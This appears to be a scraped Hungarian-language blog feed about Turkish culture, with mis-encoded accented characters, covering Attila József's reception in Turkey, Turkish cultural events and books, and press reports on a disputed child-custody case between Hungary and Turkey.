    A kצtet nagy nyeresיge az a bevezető tanulmבny, amelyet Fodor Andrבs םrt (Jףzsef Attila kצltői karaktere cםmmel), miutבn בtadtuk neki a lefordםtott versek listבjבt. ֽgy megבllapםtבsait a tצrצk olvasף בltal ismert kצltemיnyekre hivatkozva, azokbףl idיzve tבmaszthatta alב. Bekerlt a kצtetbe a Curriculum vitae, םgy a kצltő יletתtjבt a legilletיkesebb forrבsbףl ismerhetik meg a tצrצk olvasףk. Jףzsef Attila יletיnek kronolףgiבja, fיnykיpek, valamint a Militanbףl בtvett Szabolcsi Miklףs-tanulmבny, illetve az Eugčne Guillevic-előszף gazdagםtjבk a kצltőről rajzolt kיpet. A kצtet versei az első magyarbףl fordםtott Jףzsef Attila-kצltemיnyek. A legszebbekből, legismertebbekből vבlogattunk, יs תjrafordםtottunk nיhבnyat a Militanban kצzvetםtő nyelvből kיszםtett fordםtבsban szereplő kצltemיnyek kצzl is.
    -
    -
    -
    -
    -
    Tםz יv telt el a nagy visszhangot kivבltף Temiz Yrekle-kצtet megjelenיse utבn. Akkoriban az ankarai egyetem hungarolףgiai tanszיkיn tanםtottam. ֽgy kerlt a kezembe a Cumhuriyet cםmű תjsבg 1996. בprilis 14-i szבmבnak vasבrnapi mellיklete, cםmlapjבn a kצltő יletnagysבgת fיnykיpיvel, alatta ezzel a szצveggel: „Kצltő volt, sose lףdםtott. Jףzsef Attila, a magבny nagy kצltője. Kritikus יs realista. A verseit ismerjk. Ennyi nem elיg. Az יletיnek יs a verssorainak alapjבul szolgבlף fבjdalmak יs remיnytelensיgek nyomבba szegődnk. A magבny legnagyobb kצltője. Az בrvasבg יs a nincstelensיg יs a szerelem fבjdalmבt verseiben prףbבlta csitםtani. Minden fיlbemaradt az יletיben. Egyetemre jבrt, de nem fejezhette be, szerelmeket יlt בt, de a beteljeslיst nem יlhette בt. Harminckיt יves korבban a vonatkerekek alב vetette megfבradt, magבnyos testיt. Halבlבrףl is maga mondta ki az utolsף szףt: »בmulok, hogy meghalok«.” A fיnykיpekkel kםsיrt םrבs szבmomra akkor mיg ismeretlen szerzője, Sunahan Develioglu terjedelmes riportjבban nagy יrzיkenysיggel kצveti nyomon a kצltő יletיnek בllomבsait a Gבt utcבtףl Balatonszבrszףig.
    -
    -
    -
    -
    -
    Nיhבny hיt mתlva az Evrensel Kltr folyףirat Jףzsef Attila-műsorבra vagyok hivatalos. Kemal ײzerrel szףlunk a kצltőről. Egy fiatalember, Onur Toparlak gitבrkםsיrettel tצrצkl יs magyarul (!) יnekel a verseiből. Ott ismerkedem meg felesיgיvel, Sunahannal, s ekkor derl fיny םrבsa szletיsיnek kצrlmיnyeire. „Előszצr 1986-ban jבrtam Magyarorszבgon, יs annyira tetszett, hogy 1993-ban, amikor צsszehבzasodtunk, ide jצttnk nבszתtra. Egyszer Onur םgy szףlt hozzבm: »Te mבr jבrtבl Magyarorszבgon. Nיzz kצrl a kצnyvek kצzצtt, nem lבtsz-e magyar kצltőt.« Egy Petőfi-kצtetet talבltam. Akkor persze semmit nem tudtunk magyarul. A kצtet יpp a Szerelem cםmű versnיl nyםlt ki. A ritmusבt erősnek יrezte Onur. Zenיt rצgtצnzצtt hozzב, יs szףtבrral prףbבltuk megfejteni az יrtelmיt. ֽgy indult a mi magyarorszבgi kalandunk… Jףzsef Attila szבmunkra a Temiz Yrekle-kצtettel kezdődצtt. gy gondoltuk, hogy a versek Tasnבdi Edit יs Kemal ײzer tolmבcsolבsבban kצzel בllnak az eredetihez, de hogy halljuk is a versek eredeti ritmusבt, megvettk Jףzsef Attila verseit magyarul is, יs a kיt kצtetet egytt olvastuk. Mבsodik jצvetelnkkor azutבn az ő nyomבba eredtnk…”
    -
    -
    -
    -
    -
    jabb יvtized mתltבn a Jףzsef Attila-centenבrium mozgףsםtotta a kצltő tצrצkorszבgi barבtait. Kיt lelkes fiatal, tanםtvבnyom, Sevgi Can Aysevener יs Orhan Tleylioglu szerkesztיsיben, ankarai nagykצvetsיgnk tבmogatבsבval az Edebiyatחilar Dernegi (Irodalmבrok Tבrsasבga) kiadבsבban jelent meg az emlיkkצnyv, Evrenle ײlח Kendini (A mindensיggel mיrd magad) cםmmel. A kיpekkel illusztrבlt kצtet a kיt szerkesztő bekצszצntőjיvel indul, ezt a Curriculum vitae kצveti, majd Ahmet Oktay, Kemal ײzer, Metin Demirtas, Ataol Behramoglu, Behחet Aysan יs Mslm Celik Jףzsef Attila ihlette versei kצvetkeznek. A tovבbbiakban kצltő, םrף, irodalomtצrtיnיsz, szociolףgus, filozףfus יs pszicholףgus vall arrףl, hogy mit jelent szבmבra Jףzsef Attila. ֹlmיnyeik a fent emlםtett kיt vבlogatבsra tבmaszkodnak, a szenvedיssel teli יlet יs a tragikus vיg momentumai, a szeretni valף egyיnisיg יs a szeretetre vבgyף ember portrיja, a finom kיpek יs a lבzםtף tבrsadalmi igazsבgtalansבgok kצltője jelenik meg ezekben a szubjektםv hangת םrבsokban. Ahogy a kצnyvről megjelent hosszabb-rצvidebb ismertetיsek egyike fogalmaz: „A kצnyv az irodalmבrok szםvיben יlő Jףzsef Attila-arckיpet rajzolja meg.” Ezektől eltיrő תton jבr nיhבny szerző: Ahmet Imam az Ars poeticבt elemzi, Onur Toparlak pedig az Altatף בtltetיse kapcsבn a versfordםtבs lehetősיgeiről יs lehetetlensיgeiről elmיlkedik. Sunahan Develioglu Jףzsef Attila יs Nazim Hikmet sorsבban יs kצltיszetיben fedez fel pבrhuzamossבgokat; jףmagam a kיt magyar gיniusz, Jףzsef Attila יs Bartףk Bיla művיszetיnek kצzצs gyצkereire prףbבlok rבvilבgםtani. Sajבtos szםnt kיpvisel Selחuk lger םrבsa: a Nיmetorszבgban taxisofőrkיnt dolgozף szerző a frankfurti replőtיrre יrkező Malיv-utasokat kedvenc versיből, a Mamבbףl „vizsgבztatja”, s azoknak, akik hozzב hasonlףan Jףzsef Attila-rajongףnak mutatkoznak, enged a fuvardםjbףl…
    -
    -
    -
    -
    -
    Az emlיkkצnyvben harminchיt vers kapott helyet. Az תj fordםtבsok mindenekelőtt a korai korszakbףl vבlogatva gazdagםtjבk תj szםnekkel a tצrצk versbarבtok בltal eddig ismert Jףzsef Attila-portrיt, ugyanakkor a szerkesztők bevבlogattak nיhבnyat a korבbbi fordםtבsokbףl is.
    -
    -
    -
    -
    -
    Mire mבjus 7-יn bemutattבk a kצnyvet, a kiadף mבr az utבnnyomבsra kיszlt. Az יrdeklődők zsתfolבsig megtצltצttיk a termet. Kיt kצltő: Ataol Behramoglu יs Metin Demirtas, egy irodalomtצrtיnיsz יs -kritikus, ײner Yagci osztotta meg a hallgatףsבggal Jףzsef Attila-יlmיnyיt, Yildirim B. Dogan pszichiבter pedig a beteg ember vilבgבba valף betekintיs etikai kיrdיseit feszegette. Az יrdekes előadבsok a kצzצnsיget is hozzבszףlבsokra kיsztettיk. Szףba kerlt םgy mיg Petőfi יs Balassi is… Szבmomra kedves meglepetיskיnt Onur Toparlak tצbbek kצzצtt az e kצtet szבmבra fordםtott Ayi Dansit, azaz a Medvetבncot is előadta, az ismert Sebő Ferenc-dallamra יnekelve…
    -
    -
    -
    -
    -
    Ankara utבn Isztambulban folytatףdtak a Jףzsef Attila-emlיkיv esemיnyei. jra megjelent a Temiz Yrekle cםmű kצtet, amelynek diavetםtיssel kםsיrt bemutatףjבn Kemal ײzer mellett Turgay Fisekחi kצltő szףlt Jףzsef Attila tצrצk barבtaihoz; Beykozban pedig mindenekelőtt a művיszetszerető polgבrmesternek, Muharrem Ersoynak יs a szםnיsz-rendező Mehmet Asבnak kצszצnhetően szinte fesztivבli hangulatban emlיkeztek meg a szבzיves kצltőről. Az Esztergommal testvיrvבrosi kapcsolatokra kיszlő Boszporusz-parti negyed polgבrmesteri hivatala előtti tיren hatalmas transzparens hםvogatta a 300 ezer lakosת Beykoz kצzצnsיgיt. A program a tיren fתvףszenekari koncerttel kezdődצtt. Nem mindennapi יlmיny volt tצrצk muzsikusok előadבsבban hallgatni a Himnuszt יs a Szףzatot. Az előadףterem előcsarnokבban a Petőfi Irodalmi Mתzeum vבndorkiבllםtבsבnak tablףi kצzצtt Sunahan Develioglu eredeti צtletיnek kצszצnhetően hףfehיr anyagokra nyomva, szבrםtףkצtelekre csipeszelve „keringtek, szבlltak a magasban” Jףzsef Attila יletrajzבnak rיszletei.
    -
    -
    -
    -
    -
    A jףkora előadףterem szםnpadבt csak gyertyבk vilבgםtottבk meg, a vבszonra a Petőfi Irodalmi Mתzeum centenבriumi CD-ROM-jבnak kיpeit vetםtettיk. Jףzsef Attila kצltői pבlyבjבt megrajzolף előadבsomat meg-megszakםtva mondott el Mehmet Asa illusztrבlבsul egy-egy jellemző verset, majd felolvasta a Curriculum vitae-t תgy, hogy a megfelelő pontokon Onur Toparlak יnekelt el gitבrkםsיrettel Sebő Ferenc, illetve a maga megzenיsםtיsיben tצrצkl יs magyarul egy-egy kצltemיnyt.
    -
    -
    -
    -
    -
    Mit jelent Jףzsef Attila a tצrצk olvasףknak? Idיzzk Sevgi Can Ayserent, aki az emlיkkצnyv megjelenיse kapcsבn kיszlt interjתban םgy fogalmaz: „…Jףzsef Attila versei furcsa lבzadבst יbresztettek bennem, a kצltő kiszolgבltatottsבga, magבnya, kora יs vilבga elleni dhצt. Ennek talבn szemיlyes okai is vannak. Nיhבny יvtizeddel őutבna Tצrצkorszבgban ugyanazt a szomorתsבgot, ugyanazt a kצnyצrtelensיget, ugyanazt a lבzadבst יltk בt; a vesztesיgek יs az igazsבgtalansבgok hasonlםtottak az őבltala megיltekre. Jףzsef Attila יlete יs kצltיszete, בtlיpve orszבga hatבrait, mindazokhoz szףl, akik az יletnek יs a kצltיszetnek ugyanazt az יrtelmet tulajdonםtjבk, akik ugyanazokיrt az יrtיkekיrt ugyanazt az בrat fizetik. Kיpei, rםmei, verseinek mיly יrtelme, sajבtos יs nagy hatבsת megfogalmazבsai kצltői nagysבgבt az egיsz vilבgon elismerttי tettיk…”
    -
    - -false - - - - -Efendi - -2005-12-02T18:46:00+01:00 -2006-01-04T14:04:53Z -2005-01-13T17:24:46Z - -tag:blogger.com,1999:blog-7074887.post-110563708697436556 -Tצrצk תjdonsבgok, programok, kulturבlis hםrek יs ajבnlatok -<div align="center"><a title="Photo Sharing" href="http://www.flickr.com/photos/efendi/14365144/"><img height="313" alt="Fishmongers/Eren Eyboglu (1907-1988), Istanbul Modern" src="http://static.flickr.com/12/14365144_8d48bfce90.jpg" width="500" /></a><br /><br /></div><div align="justify">Itt יrhetők el a tצrצkorszבgi vagy itthoni tצrצk programokkal, kulturבlis esemיnyekkel foglalkozף friss hםrek יs ajבnlatok. ֽrjatok, ha mבsok figyelmיt szeretnיtek felhםvni valamilyen aktuבlis esemיnyre.</div><div align="justify"><br />A blogon tematikus יs mבs kulturבlis postok is vannak (pl. mozi, kצnyv, lemez), időtבllףbb hםrekkel.<br />------------------------------------------------------ </div><div align="justify"></div><div align="justify"><strong></strong><br /></div><div align="justify"><strong>Az isztambuli Forma 1 nagydםjra kedvezmיnyes </strong>jegyבrusםtבs 2006. januבr 31-ig <a href="http://www.msoistanbul.com/index.php?&n=main">EZEN A LINKEN</a> (angol, tצrצk).</div><div align="justify"><br /></div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="justify"><strong>Orhan Pamuk םrבsa az ֹlet יs Irodalom karבcsonyi-תjיvi szבmבban <a href="http://www.es.hu/pd/display.asp?channel=PUBLICISZTIKA0551&amp;article=2005-1230-1615-58YFYW">LINK ITT</a></strong></div><div align="justify"></div><div align="justify"><strong></strong></div><div align="justify"><strong></strong><br /></div><div align="justify"><strong>Kaphatף mיg a magyar nyelvű vבlogatבs a huszadik szבzad legjobb tצrצk elbeszיlיseiből</strong> ("Van, akit sףlyom karmol meg"), pיldבul az Osiris kצnyvesboltban (postבzva is) 1800 forintיrt. <a href="http://www.osiriskiado.hu/">LINK ITT</a></div><div align="justify"><br /><em>(A tartalomjegyzיk: Halםkarnas Balikcisi: A manőver Yakup Kadri Karaosmanoglu: Egy tizennיgy יves fיrfi Sait Faik Abasiyanik: A batyu Sait Faik Abasiyanik: A Szteljanosz Hriszopulosz hajף Aziz Nesin: Egy eskvői szףnoklat Aziz Nesin: A kצnyvelő Tarik Bugra: Az stצkצs Sinasi ײzdenoglu: Egy megbבnבs tצrtיnete Leyla Erbil: A fiףk Remzi Inanc: Zihni nyakkendőtűje Ferit Edg: Ibramfia Ibram tצrtיnete Ayla Kutlu: Eltבvozבson Erendiz Atas: A bayburti Ltfiye Aydin: Sםrni nem szabad Feride Cicekoglu: Van, akit a sףlyom karmol meg Nedim Grsel: A zsebkendő Semih Gnver: Adem Ver tצrtיnete Yasar Kemal: A kםgyףk kertje Bekir Yildiz: Sahan, a csempיsz Bekir Yildiz: Elment egy lovas a vilבgbףl Orhan Kemal: A kutyakצlyצk Ayhan Sariismailoglu: Az תt Zםya Osman Saba: Boldog emberek fיnykיpיszete Osman Sahin: A fehיr צkצr) </em></div><div align="justify"><br /></div><div align="justify"></div><div align="justify">December 13-בn <a href="http://www.radio.hu/index.php?cikk_id=163072">Isztambul is benyתjtotta pבlyבzatבt az Eurףpa Kulturבlis Fővבrosa cםm elnyerיsיre</a> 2010-ben. Dצntיs 2006-ban. Pיcs יs egy nיmet vבros pבlyבzatבnak sikere gyakorlatilag mבr biztosra vehető.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify"><strong>Picasso-kiבllםtבs Isztambulban</strong> - megtekinthető 2006. mבrcius 26-ig a Sabanci Mתzeumban. LINK <a href="http://muze.sabanciuniv.edu/picasso/english/index.php">ITT</a> יs <a href="http://www.artportal.hu/index.php?mc=3&sc=3&amp;hir=1675#1675">ITT</a>. </div><div align="justify"><br /></div><div align="justify">Ha יrdekel, milyen volt <strong>Isztambul (Konstantinבpoly), a 4. szבzadtףl 1453-ig</strong>, amikor az ottomבn tצrצkצk elfoglaltבk, olvasd el <a href="http://szakkonyv.hu/konyv.php?i=5834">Georg Ostrogorsky "A bizבnci בllam tצrtיnete"</a> cםmű kצnyvיt, kaphatף az előző linken vagy az <a href="http://www.osiriskiado.hu/magyar.html">Osirisnיl</a>.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify"></div><div align="justify"><strong>Karבcsonyra megjelent vיgre magyarul is Orhan Pamuk: Hף c. regיnye!</strong></div><div align="justify"><strong></strong><br /></div><div align="justify"></div><div align="justify"></div><div align="justify">"Minden יlet, akבr a hףpehely: tבvolrףl egyformבnak tűnik, de rejtיlyes erők egyszerivי יs megismיtelhetetlennי formבljבk" - vallja Orhan Pamuk legתjabb művיben. Megismerhetjk-e a mבsok szםvיben lakozף szeretetet יs fבjdalmat? Megיrthetjk-e azokat, akik oly mיly gyצtrelmeket יs oly sok csalףdבst יltek בt, hogy elkיpzelni sem tudjuk? Ezek a kיrdיsek foglalkoztatjבk Kבt, a kצltőt, amikor tםz יv frankfurti tבvollיt utבn, יdesanyja temetיsיre hazatיr Isztambulba.</div><div align="justify"><br />Elfogadja egy liberבlis lap felkיrיsיt, hogy oknyomozף riportot םrjon a tבvoli Kars vבrosבban zajlף klצnצs esemיnyekről. Sajבt gyermekkori vבgyainak a felidיzיse is vezיrli: amint tudomבst szerez rףla, hogy elvבlt asszonykיnt ott יl a gyצnyצrű Ipek, תjra feltבmadnak rיgen elfojtott יrzיsei. Ka felkeresi a titokzatos צngyilkossבgi hullבm בldozatakיnt elhunyt fiatal lבnyok csalבdtagjait יs barבtait, a helyi rendőrsיget, az esemיnyeket megצrצkםtő יs megjףsolף Hatבrvבrosi Hםrlap szerkesztőjיt, s kצzben lassan feltבrul előtte a vבros valףdi arca. Vallבsi יs politikai vitבk mיrgezik az emberek יletיt, a fennבllף בllamhatalom יs a nצvekvő iszlבm pבrt befolyבsa alatt vallבsi fanatikusok szבllnak szembe az egyhבzi reformok hםveivel. Ka יpp a Nemzeti Szםnhבzban szavalja egyik kצltemיnyיt, amikor fegyveres zavargבs tצr ki, יs a nיzőtיren יletיt veszti az iszlבm egyhבzi kצzיpiskola nיhבny tanulףja. A tragיdia rettenetes esemיnyek sorבt Indםtja el: letartףztatבsok, ldצztetיsek, gyilkossבgok kצvetik egymבst, sokan a kurd nacionalistבkat okoljבk, tצbben pedig politikai tőkיt prףbבlnak kovבcsolni a forrongבsbףl. Az idיn Bיke-dםjjal jutalmazott Pamuk regיnye szlőhazבjבban heves indulatokat vבltott ki. Az isztambuli gyיszsיg perbe fogta a nיpszerű םrףt, mivel arrףl beszיlt, hogy Tצrצkorszבgban egymilliף צrmיnyt יs harmincezer kurdot gyilkoltak meg, amit az orszבg mindmבig nem ismert el hivatalosan. A Hף viszont egyיrtelmű kritikai יs olvasףi sikert aratott A mיltatבsok mind hangsתlyoztבk, hogy a szerző - aki az irodalmi Nobel-dםj egyik legerיlyesebbnek tartott vבromבnyosa-elemi erővel בbrבzolja a modern vilבg nyers brutalitבsבt יs elvakultsבgבt, יs minden szenzבciףיhes hםradבsnבl felkavarףbban irבnyםtja rב figyelmnket a kor יs a tיrsיg aktuבlis problיmבira,- םrja ismertetőjיben a Fףkusz On-line, ahol a kצnyv megvבsבrolhatף. <a href="http://www.fo.hu/cgi-bin/start.cgi/apps_fokusz/display/index.html?termek.id=92475&tag=2">LINK ITT</a> Pamuk bםrףsבgi pere egyיbkיnt december 16-בn kezdődik Isztambulban, de mבr folyamatban van egy mבsodik per is ellene.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify"><strong>Megjelent Vecdet Erkun "Budapesttől Ankarבig" c. kצnyve.</strong> "Szegיny יs szorgalmas tצrצk diבk volt Vecdet Erkun, amikor vבratlanul klfצldi tanulmבnyi צsztצndםjat nyert Magyarorszבgra. Agrבrmיrnצki diplomבt szerzett a Jףzsef Nבdor Műszaki יs Gazdasבgtudomבnyi Egyetemen, יs hazatיrt, hogy hasznosםtsa a magyar mezőgazdasבgban szerzett tapasztalatait. Mindez 1937 יs 1943 kצzצtt tצrtיnt, amikor mיg, amint olvashatjuk, „Budapesten, ha sok volt a hף, tettek ellene. Pיldבul a hבzmesterek eltakarםtottבk a havat a hבz előtti jבrdבrףl. Az תttestre lekotort havat a polgבrmesteri hivatal teherautףkkal vagy hףkotrף gיpekkel צsszeszedette יs a Dunבba hordatta. Az utat יs az utcבk kצzepיt צtpengős ףrabיrיrt felfogadott hףmunkבsok takarםtottבk le. A tיli hidegben dolgozף munkבsoknak ףrבnkיnt tםz perc pihenőt יs forralt bort vagy boros teבt adtak.”Ilyesfajta kיpeket םr le neknk Vecdet Erkun professzor emlיkiratבban, amelynek a Budapesttől Ankarבig cםmet adta, יs amelyet a Magyar–Tצrצk Barבti Tבrsasבg jelentetett meg magyarul Tasnבdi Edit fordםtבsבban. S bבr az 1937–43 kצzצtti időszak nem a magyar tצrtיnelem legfיnyesebb korszaka, fenyeget, majd kitצr a vilבghבborת, az ifjת diבk mיgis igen kedvező kיpet fest a magyarokrףl: יrdekesek, kedvesek, befogadףk, segםtőkיszek יs igen kulturבltak. Lehet, hogy az idő יs a nosztalgia szיpםti םgy meg Vecdet Erkun emlיkeit, de a vיgeredmיny mיgiscsak az, hogy az olvasף elkezd vבgyakozni. Nemcsak azיrt, mert akkor mיg a hבzmesterek takarםtottבk az utcבkat, hanem mert szerethető Magyarorszבg-kיpet kapunk a vendיgtől. Kivבlף egyetemi tanבrokrףl olvashatunk, magas szintű oktatבsrףl, virבgzף mezőgazdasבgrףl יs rokonszenves emberekről. Ilyen volt tיnyleg? Szeressk a tצrצkצket! ֹs a magyarokat is! <em>(Hanthy Kinga: "Szeressk a magyarokat!", Magyar Nemzet, 2005. oktףber 8. )</em></div><div align="justify"><br /></div><div align="justify"><strong></strong></div><div align="justify">2004. legjobb mozija a tצrצk filmkritikusok szerint Ahmet Ulucay első jבtיkfilmje, a <strong>"Hajףk dinnyehיjbףl"</strong> (Karpuz Kabugundan Gemiler Yapmak).</div><div align="justify"></div><div align="justify"><br /></div><div align="justify">Az <strong>ISTANBUL MODERN</strong> nevű kortבrs kיpzőművיszeti mתzeum cםme, nyitvatartבsa <a href="http://www.istanbulmodern.org/engl.aspx">EZEN A LINKEN</a> (TR, EN) talבlhatף.</div><div align="justify"></div><div align="justify"><br /></div><div align="justify">2005. januבrjבtףl a magyar mozikban <strong><a href="http://www.magyar.film.hu/object.49C429C6-D1A4-46A6-A145-908FB9788FC7.ivy">Nuri Bilge Ceyhan MESSZE (UZAK)</a></strong> c. filmje, amely 2003-ban nagydםjat nyert a Cannes-i Filmfesztivבlon. Kצlcsצnצzni is lehet DVD-n יs kazettבn az <a href="http://www.odeon.hu/kat.phtml?id=5926">Odeontףl</a> a Corvin, Puskin, Tabבn יs Hollבn mozikban Budapesten. A filmről kritikבt olvashatsz a <a href="http://www.mancs.hu/index.php?gcPage=/public/hirek/hir.php&amp;id=11146">Magyar Narancs 2005. jan. 20-i szבmבban</a>.</div><div align="justify"></div> -false - - - - -Efendi - -2005-07-10T23:03:00+02:00 -2005-12-12T14:33:44Z -2005-05-20T09:21:00Z - -tag:blogger.com,1999:blog-7074887.post-111658086052973264 -Egy יve se gyerek, se hםr - Mehmet Tysz Kבroly tצrtיnete -<div align="center"><a href="http://photos1.blogger.com/img/284/1037/1024/mtk.jpg"><img style="BORDER-RIGHT: #000000 2px solid; BORDER-TOP: #000000 2px solid; MARGIN: 2px; BORDER-LEFT: #000000 2px solid; BORDER-BOTTOM: #000000 2px solid" src="http://photos1.blogger.com/img/284/1037/400/mtk.jpg" border="0" /></a><br />Mehmet Tysz Kבroly (8)</div><div align="center"><br /></div><div align="center"></div><div align="center"><strong><span style="color:#ff0000;">Mבjus 25. az Eltűnt Gyermekek Vilבgnapja</span> </strong></div><div align="center"><strong><a href="http://www.reggel.hu/index.php?apps=cikk&cikk=13555">Minden hףnap 10-יn tntetnek (?) Karcsikביrt<br /></a></strong><br /><br /></div><div align="justify"><strong><span style="font-size:130%;">Visszakaphatja fiבt a szegedi יdesanya</span></strong></div><div align="justify"><strong><span style="font-size:130%;"></span></strong></div><div align="justify"><strong><span style="font-size:85%;">G. Juhבsz Judit, Magyar Nemzet, </span></strong></div><div align="justify"><strong><span style="font-size:85%;">2005. november 14. </span></strong></div><div align="justify"><strong><span style="font-size:130%;"></span></strong><br /></div><div align="justify"><strong><span style="font-size:130%;"></span></strong></div><div align="justify"><em>Feltehetőleg jogerőssי vבlik november vיgיn a tצrצk bםrףsבg elsőfokת dצntיse, amelynek יrtelmיben az apja בltal Tצrצkorszבgba csempיszett Tysz Mehmet Kבrolyt az יdesanyjבnבl, Szegeden helyezik el. Annבl is inkבbb, mert a tצrצk apבt egy isztambuli bםrףsבg egy יv bצrtצnbntetיsre םtיlte, miutבn kיt alkalommal is meghiתsםtotta a gyermek יs magyar יdesanyja talבlkozבsבt.</em></div><div align="justify"><br />Vבrhatףan helybenhagyja a tצrצk bםrףsבg az elsőfokת dצntיst, יs november 25-יn jogerősen is az יdesanyבnak םtיli a nyolcיves Tysz Mehmet Kבrolyt, akit tavaly nyבron az apja hat magyar בllampolgבr segםtsיgיvel egy lבthatבs utבn Szegedről Tצrצkorszבgba csempיszett. A kצzreműkצdők ellen a Szegedi Vבrosi Bםrףsבgon eljבrבs indult, az apa יs a gyerek ellen pedig a magyar hatףsבgok nemzetkצzi kצrצzיst adtak ki.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Az יdesanya, Papp Edina hףnapokon בt kereste kisfiבt, בm a tצrצk hatףsבgok vajmi keveset tettek. Volt fיrje telefonon vagy gyvיdje rיvיn tצbbszצr is tudtבra adta: csak akkor lבthatja gyermekיt, ha előbb hivatalosan lemond rףla. Vיgl arra hivatkozva, hogy hazבnkban neki םtיltיk a kisfiתt, az asszony a hבgai bםrףsבghoz fordult. A kיrelem alapjבn a tצrצk hatףsבg szeptemberben תgy hatבrozott, hogy a vיgleges elhelyezיsig a gyerek az apבnבl marad, de minden mבsodik hיt szombatjבn talבlkozhat יdesanyjבval. ֱm Papp Edina hiבba utazott Tצrצkorszבgba, Kבrolyt egyszer sem talבlta a kijelצlt helyen, nagyszlei lakבsבban, volt fיrje szlei pedig azt בllםtottבk, hogy fogalmuk sincs fiuk יs unokבjuk hollיtיről.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">A napokban azonban a tצrצk bםrףsבg kיtszer hat hףnap bצrtצnbntetיsre םtיlte Tysz Mehmetet, mert kיt alkalommal is megakadבlyozta, hogy a kisfiת talבlkozzיk יdesanyjבval.Ha a bujkבlף fיrfi nem veszi בt a hatבrozatot, nem is fellebbezhet ellene, םgy az םtיlet mבsfיl hףnap mתlva jogerőssי vבlik, יs Tצrצkorszבgban is kצrצzיst adnak ki ellene – kצzצlte Fצldesi-Szabף Lבszlף, az יdesanya utazבsait יs gyvיdjיt finanszםrozף Egy-Mבsיrt Kiemelkedően Kצzhasznת Nemzetkצzi Alapםtvבny kuratףriumבnak vezetője.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">A kisfiת יs apja hosszabb ideje ismeretlen helyen tartףzkodik. A gyerek anyja a napokban azt a hםrt kapta, hogy Amerikבban bujkבlnak. Papp Edina elmondta: erős a gyanת, hogy a fיrfi םgy akarja fיlrevezetni a hatףsבgokat, hiszen kevיssי valףszםnű, hogy nemzetkצzi kצrצzיs alatt vagy hamis תtlevיllel בtjuthatnבnak a szigorת hatבrellenőrzיsen.</div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong> <br /></div><div align="justify"><strong><span style="color:#ff0000;">FIGYELEM! A tצrtיnetről kיt mבsik blogon is olvashattok: </span></strong></div><div align="justify"><br /></div><div align="justify"></div><div align="justify"><a href="http://sesblog.hu/archives/individual/015224-20050812.html"><strong><span style="color:#ff0000;">Sesblog: Tצrצk gyerek megvבgta, magyar בllam gyףgyםtja, sםppal, dobbal... </span></strong></a><strong><span style="color:#ff0000;">יs a </span></strong><a href="http://pocakos.blogspot.com/2005/08/valban-itt-tartunk.html"><strong><span style="color:#ff0000;">Pocakos News blogon: Valףban itt tartunk?</span></strong><br /></a></div><div align="justify"><br /></div><div align="justify"><strong><span style="font-size:130%;"></span></strong></div><div align="justify"><strong><span style="font-size:130%;">2005. jתlius 11. - Kit יrdekel Mehmet Tysz Kבroly kiskorת magyar בllampolgבr?</span></strong></div><div align="justify"><br /></div><div align="justify"><strong><span style="font-size:130%;"></span></strong></div><div align="justify"><strong><span style="font-size:130%;"></span></strong></div><div align="justify"><strong><span style="font-size:130%;"></span></strong></div><div align="justify"><strong><span style="font-size:130%;"></span></strong></div><div align="justify">Ma egy יve, hogy eltűnt Karcsika.</div><div align="justify"></div><div align="justify"></div><div align="justify">Kיt hףnapja mondta a tצrצk miniszterelnצk, hogy szemיlyesen nיz utבna, mi a helyzet. Mבsfיl hףnapja "talבlta meg" egy tצrצk lap Mehmet Tysz Kבroly kiskorת magyar בllampolgבrt Isztambulban. Azףta csend.<br /></div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="justify"><strong><span style="font-size:130%;"></span></strong></div><div align="justify"><strong><span style="font-size:130%;">2005. jתnius 12.</span></strong></div><div align="justify"><strong><span style="font-size:130%;"></span></strong><br /></div><div align="justify"><strong><span style="font-size:130%;"></span></strong></div><div align="justify">Karcsikבt ugyan mיg mindig nem bםrtבk hivatalosan megtalבlni, de a Zaman napilap תjsבgםrףja Magyarorszבgon jבrt. ֽrבsaibףl kiderl, hogy a kisfiת gyיben per indult Tצrצkorszבgban - persze, nem a gyermekrablף apa ellen, hanem יppensיggel Ő indםtotta azt a gyermek megszerzיse יrdekיben. Első tבrgyalבs szeptemberben. </div><div align="justify"><br /></div><div align="justify">Az תjsבgםrף szerint a Magyarorszבgon letelepedett kb. ezerצtszבz tצrצk hasonlף cipőben jבr, mint Mehmet Tysz, mivel בltalבban nem kצtnek polgבri hבzassבgot magyar partnerkkel.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">A cikkek linkje: <a class="koyubaslik" href="http://www.zaman.com.tr/?bl=haberler&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;alt=&trh=20050612&amp;hn=182466">Hatami kabul ediyorum; ama anneyim</a> יs <a href="http://www.zaman.com.tr/?bl=haberler&alt=&amp;trh=20050612&hn=182467">Macaristan, Zaman'i konusuyor</a></div><div align="justify"><br /></div><div align="justify"></div><div align="justify"><strong><span style="font-size:130%;"></span></strong></div><div align="justify"><strong><span style="font-size:130%;">2005. mבjus 26.</span></strong></div><div align="justify"><strong><span style="font-size:130%;"></span></strong><br /></div><div align="justify"><strong><span style="font-size:130%;"></span></strong></div><div align="justify"><span style="font-size:130%;"><a href="http://www.nol.hu/cikk/363594/"><strong><span style="font-size:100%;">"Tצrצk gyerek, magyar gyerek"</span></strong></a><strong> </strong></span><span style="font-size:100%;">Nיpszabadsבg, mבjus 26.</span></div><div align="justify"><span style="font-size:100%;"></span></div><div align="justify"></div><div align="justify"></div><div align="justify"><strong></strong><br /></div><div align="justify"><strong>Efendi kommentבrja:</strong></div><div align="justify"><strong></strong><br /></div><div align="justify"></div><div align="justify">A Nיpszabadsבg cikkיből kiderl: mikצzben egy Tצrצkorszבg nevű בllam kיpviselői kצzel egy יve arrףl biztosםtanak minket, hogy mindent megtesznek Mehmet Tysz Kבroly kiskorת magyar בllampolgבr felkutatבsביrt, egy mבsik orszבgban, amelyet vיletlenl szintיn Tצrצkorszבgnak hםvnak, a kisfiתt anyakצnyvezik יs בllampolgבrsבgot adnak neki.<br /><br />A cikkből most mבr tudjuk: Tysz Mehmet Kבroly apja a chicagףi tצrצk főkonzulבtuson apai elismerő 